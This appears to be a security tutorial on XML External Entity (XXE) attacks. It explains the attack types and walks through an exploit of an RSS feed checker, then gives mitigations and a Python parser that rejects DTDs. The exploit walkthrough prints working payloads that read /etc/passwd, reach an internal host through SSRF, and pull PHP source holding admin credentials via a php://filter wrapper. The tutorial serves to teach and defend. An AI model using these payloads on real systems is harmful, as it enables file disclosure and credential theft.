Exploitation: XML External Entity (XXE)

INDEX

What is XXE

Types

Exploit XXE

Preventive Measures / Mitigation

What is XXE: An XML External Entity attack is a type of attack against an application that parses XML input. It often allows an attacker to view files on the application server file system, and to interact with any backend or external systems that the application itself can access.

In some cases, XXE can also be used to perform server-side request forgery, port scanning and remote code execution.

Ex: Consider a website www.toy.com that checks a product's stock before adding it to the cart. The website uses Extensible Markup Language (XML) input to submit and parse the request. The following request is used to check the product's stock.

<?xml version="1.0" encoding="UTF-8"?>
<toyCheck><toyId>381</toyId></toyCheck>

If the XML parser is weak and processes requests without any validation, an attacker can modify the original request and use the file scheme (file:///) to fetch sensitive files from the server.


Explanation:

· Initially the attacker sends an XML request to the web application and observes that the XML parser processes it without any validation.

· The attacker then modifies the DTD (Document Type Definition) according to the sensitive files they want to fetch from the target server.

· The modified request is sent to the server again to retrieve the sensitive information.

Types: There are various types of XXE attacks:

· Exploiting XXE to retrieve files: an external entity is declared whose value is a sensitive file on the server, and the parser fetches it.

Ex: Consider a construction company's application that submits a house ID and processes the data as XML.

<?xml version="1.0" encoding="UTF-8"?>
<ProjectId><HouseId>381</HouseId></ProjectId>

Since the web application performs no validation against XXE attacks and we want to read files on the server, we modify the DTD.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<ProjectId><HouseId>&xxe;</HouseId></ProjectId>

Note: Here &xxe; is the entity reference that echoes the contents fetched via the file scheme.

When this request is processed, the XXE payload defines an external entity xxe whose value is the contents of the /etc/passwd file and uses the entity within the ProjectId value, so the file contents are returned in place of the house ID.

· Exploiting XXE to perform SSRF attacks: the server-side application can be made to issue HTTP requests to any URL the attacker supplies.

<!DOCTYPE testXXE [ <!ENTITY xxe SYSTEM "https://internal.testwebsite.com:1234/"> ]>

In the above example, the external entity xxe declared in the testXXE DOCTYPE makes the server try to connect to internal.testwebsite.com.

· Exploiting blind XXE to exfiltrate data out-of-band: in the two cases above the fetched contents come back in the response, but here the response shows nothing, so whether XXE is possible, and what data was fetched, can only be determined through an out-of-band channel.

· Exploiting blind XXE to retrieve data via error messages: the attacker can trigger a parsing error message that contains sensitive data, and the information contained in the error message is then used to carry out the XXE attack.

Exploit XXE:

AIM: Our aim is to retrieve the administrator password.

Here we take the example of a website that has a feature for checking an RSS feed. RSS feeds are made of XML, so the feature asks for a URL, fetches the RSS feed from that URL after it is submitted, and checks its validity by processing it.


XML POC

Now we will use a malicious RSS feed that has an external entity defined in it. When processed, the entity will show the contents of the /etc/passwd file.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>The Blog</title>
<item>
<title>&xxe;</title>
</item>
</channel>
</rss>

But with the above POC we were not able to get the XXE, as it may be blocking the file scheme, so I modified the external entity scheme and used a PHP wrapper to fetch the index.php file. I uploaded this on GitHub and, looking at its raw version, got this URL:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>The Blog</title>
<item>
<title>&xxe;</title>
</item>
</channel>
</rss>

After submitting the URL https://raw.githubusercontent.com/readacted/redacted/master/xml

This time we bypassed the filtering and I got the contents of the index.php file, encoded in base64.


From the browser I copied the encrypted string.

I used Burp Suite to decode the string and got the source code of index.php.

This whole string is the encoded form of a web page developed in PHP.

In Burp:


Note: Due to privacy issues I removed a lot of the decoded web page content.

This page also has the admin's credentials in it. PHP wrappers come in handy when the plain file scheme is blocked.

Preventive Measures / Mitigation

· Disable Document Type Definitions (DTDs). If it is not possible to disable DTDs completely, then external entities and external document type declarations must be disabled in the way that is specific to each parser.

· Implement a whitelisting policy for XML data so that hostile XML data is filtered out rather than processed.

· Validate file upload functionality through which XML data can be uploaded.

· Use up-to-date versions of XML processors so that there is less chance of a bypass.
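The following is an added example, not code from the original post or from the site it describes, showing the first mitigation applied to the RSS-checking feature above: the feed parser rejects any DOCTYPE the moment it appears and, as defence in depth, never resolves external general entities. It is written in Python with only the standard library (xml.sax on top of expat); the sample feeds are constructed here from the post's payload.

```python
import io
import xml.sax
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             property_lexical_handler)
# Constructed sample inputs: the post's malicious feed (trimmed) and a benign one.
MALICIOUS_FEED = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<rss version="2.0"><channel><title>The Blog</title>
<item><title>&xxe;</title></item></channel></rss>"""
BENIGN_FEED = b"""<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"><channel><title>The Blog</title>
<item><title>First post</title></item></channel></rss>"""

class DoctypeRejected(ValueError):
    """Raised as soon as the parser sees a DOCTYPE; an RSS feed never needs one."""

class FeedTitles(ContentHandler):
    """Collects <title> text; as the lexical handler it also refuses any DTD."""
    def __init__(self):
        super().__init__()
        self.titles, self._buf = [], None
    def startElement(self, name, attrs):
        if name == "title":
            self._buf = []
    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)
    def endElement(self, name):
        if name == "title":
            self.titles.append("".join(self._buf))
            self._buf = None
    # startDTD fires before any <!ENTITY ...> in the DTD is processed, so the
    # SYSTEM entity pointing at file:/// or php://filter is never declared.
    def startDTD(self, name, public_id, system_id):
        raise DoctypeRejected(f"DOCTYPE '{name}' is not allowed in feed input")
    def endDTD(self): pass
    def comment(self, text): pass
    def startCDATA(self): pass
    def endCDATA(self): pass

def parse_feed_titles(xml_bytes):
    """Return every <title> text in the feed, or raise DoctypeRejected."""
    handler = FeedTitles()
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)  # never fetch external entities
    parser.setProperty(property_lexical_handler, handler)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.titles
```

Logging each DoctypeRejected together with the submitted feed URL gives a simple detection signal for XXE attempts against the feature.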
